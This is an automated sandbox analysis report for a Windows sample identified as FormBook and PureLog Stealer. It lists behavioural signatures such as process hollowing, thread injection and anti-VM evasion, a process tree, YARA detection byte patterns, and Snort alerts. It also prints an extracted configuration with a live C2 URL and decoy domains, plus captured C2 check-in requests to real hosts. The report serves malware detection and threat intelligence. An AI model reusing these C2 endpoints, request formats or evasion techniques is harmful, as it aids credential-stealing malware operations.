Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
duGqHKp0OUXaX1D.exe

Overview

General Information

Sample name:duGqHKp0OUXaX1D.exe
Analysis ID:1410995
MD5:e2eda8c49ab184de6d3b030bd499e4d1
SHA1:2747c8421270d9630708f343b98fb2012dc38003
SHA256:d68a5d440931df383de62e3436f5f485ecd75b552e8b78065706a8c880828378
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • duGqHKp0OUXaX1D.exe (PID: 7548 cmdline: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe MD5: E2EDA8C49AB184DE6D3B030BD499E4D1)
    • duGqHKp0OUXaX1D.exe (PID: 7656 cmdline: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe MD5: E2EDA8C49AB184DE6D3B030BD499E4D1)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • help.exe (PID: 7700 cmdline: C:\Windows\SysWOW64\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 7736 cmdline: /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.grupooceanique.com/ns03/"], "decoy": ["dipity.tech", "agathis.fun", "ekaterinai.store", "elizabethsbookshelf.com", "smilesustainably.com", "tapeworm.xyz", "beatricesswarthout.xyz", "nsrpackersandpackers.in", "yedxec.xyz", "gildedbeautyaesthitics.com", "hanibalbechar.com", "fichaphuman.net", "adilosk.shop", "geezaran.com", "ventasemail.com", "phonecasesdirect.store", "rctjuc.shop", "sukimossmanagement.com", "caller-id.today", "kft07.vip", "mahbubamaahi.com", "tcindustrie.net", "ng-stl.com", "vb4n53g4fh354gf5jh.top", "repair-services.today", "fonbnk.pro", "olivabelle.com", "pqeomjr.cc", "elevatedblanks.net", "ambiatec.solutions", "quantumaster.online", "pocket-option.tech", "circly.net", "focus2c.com", "armacao-de-oculos.com", "bmcj365.com", "maxhealthunity.com", "taifengtechnologyservice.com", "zerolethal.com", "dramaqu.guru", "kukrejaassociates.in", "jamesjenner.com", "signature-perfect.com", "fbaparadise.com", "yandada.us", "rcpbooks.site", "celonstore.fun", "dailynewarker.com", "594545.xyz", "chuanruhaomen.com", "planetpost.lol", "kinovod130424.pro", "lavanced.com", "leclandesparents.com", "childnchestcare.com", "taiyuanbaoyang.com", "engagenotrage.com", "halffullliving.com", "scheuermannworks.com", "oengpalworld.store", "derech-hamagah.com", "clintomator.com", "velvetgloveseasonings.store", "pkclubc.site"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 26 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.duGqHKp0OUXaX1D.exe.4f50000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                Click to see the 9 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:03/18/24-14:45:15.449269
                SID:2031412
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:42:31.107731
                SID:2031412
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:44:13.611801
                SID:2031412
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:41:50.896878
                SID:2031412
                Source Port:49711
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:43:52.963321
                SID:2031412
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:42:51.242337
                SID:2031412
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:44:34.116378
                SID:2031412
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:43:11.686520
                SID:2031412
                Source Port:49715
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.grupooceanique.com/ns03/"], "decoy": ["dipity.tech", "agathis.fun", "ekaterinai.store", "elizabethsbookshelf.com", "smilesustainably.com", "tapeworm.xyz", "beatricesswarthout.xyz", "nsrpackersandpackers.in", "yedxec.xyz", "gildedbeautyaesthitics.com", "hanibalbechar.com", "fichaphuman.net", "adilosk.shop", "geezaran.com", "ventasemail.com", "phonecasesdirect.store", "rctjuc.shop", "sukimossmanagement.com", "caller-id.today", "kft07.vip", "mahbubamaahi.com", "tcindustrie.net", "ng-stl.com", "vb4n53g4fh354gf5jh.top", "repair-services.today", "fonbnk.pro", "olivabelle.com", "pqeomjr.cc", "elevatedblanks.net", "ambiatec.solutions", "quantumaster.online", "pocket-option.tech", "circly.net", "focus2c.com", "armacao-de-oculos.com", "bmcj365.com", "maxhealthunity.com", "taifengtechnologyservice.com", "zerolethal.com", "dramaqu.guru", "kukrejaassociates.in", "jamesjenner.com", "signature-perfect.com", "fbaparadise.com", "yandada.us", "rcpbooks.site", "celonstore.fun", "dailynewarker.com", "594545.xyz", "chuanruhaomen.com", "planetpost.lol", "kinovod130424.pro", "lavanced.com", "leclandesparents.com", "childnchestcare.com", "taiyuanbaoyang.com", "engagenotrage.com", "halffullliving.com", "scheuermannworks.com", "oengpalworld.store", "derech-hamagah.com", "clintomator.com", "velvetgloveseasonings.store", "pkclubc.site"]}
                Multi AV Scanner detection for submitted file
                Source: duGqHKp0OUXaX1D.exeReversingLabs: Detection: 63%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: duGqHKp0OUXaX1D.exeJoe Sandbox ML: detected
                Source: duGqHKp0OUXaX1D.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: duGqHKp0OUXaX1D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: wntdll.pdbUGP source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: duGqHKp0OUXaX1D.exe, duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: uSpw.pdb source: duGqHKp0OUXaX1D.exe
                Source: Binary string: help.pdbGCTL source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: help.pdb source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: uSpw.pdbSHA256 source: duGqHKp0OUXaX1D.exe
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 4x nop then pop edi2_2_0040E481
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi4_2_0293E481

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49711 -> 104.21.23.10:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49713 -> 172.67.146.200:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49714 -> 172.67.160.57:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49715 -> 172.67.171.253:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49716 -> 216.40.34.41:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49717 -> 192.0.78.25:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49718 -> 15.197.142.173:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49719 -> 208.91.197.27:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: www.grupooceanique.com/ns03/
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.beatricesswarthout.xyz
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 HTTP/1.1Host: www.agathis.funConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw HTTP/1.1Host: www.repair-services.todayConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?Mli=K6g4eT3z1o+VClStDjZqHdZbDfQGHeVBUJKwXzUAMY2nFTZ9zwf6CslA69neyKiZ7S0e&9rQhA=J48H HTTP/1.1Host: www.taiyuanbaoyang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n HTTP/1.1Host: www.beatricesswarthout.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq HTTP/1.1Host: www.velvetgloveseasonings.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H HTTP/1.1Host: www.gildedbeautyaesthitics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj HTTP/1.1Host: www.maxhealthunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB HTTP/1.1Host: www.scheuermannworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
                Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
                Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF0FF82 getaddrinfo,setsockopt,recv,3_2_0DF0FF82
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 HTTP/1.1Host: www.agathis.funConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw HTTP/1.1Host: www.repair-services.todayConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?Mli=K6g4eT3z1o+VClStDjZqHdZbDfQGHeVBUJKwXzUAMY2nFTZ9zwf6CslA69neyKiZ7S0e&9rQhA=J48H HTTP/1.1Host: www.taiyuanbaoyang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n HTTP/1.1Host: www.beatricesswarthout.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq HTTP/1.1Host: www.velvetgloveseasonings.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H HTTP/1.1Host: www.gildedbeautyaesthitics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj HTTP/1.1Host: www.maxhealthunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB HTTP/1.1Host: www.scheuermannworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: unknownDNS traffic detected: queries for: www.agathis.fun
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 13:41:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 18 Mar 2024 13:42:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDsIRP8EKti7nrZv%2BY0dk8ooQjL6SpMY87vWpP%2FcqpilLP%2FvaPStzvuIk41EpVUj2h5Q1No71IkF%2BeHrQeHXpE1HbnblQu%2Bwt2EpzGy3PzXKqpqR280Z6D04Np77ABwswf8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8665a4815f961902-EWRalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-eq
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 18 Mar 2024 13:44:34 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: duGqHKp0OUXaX1D.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: duGqHKp0OUXaX1D.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
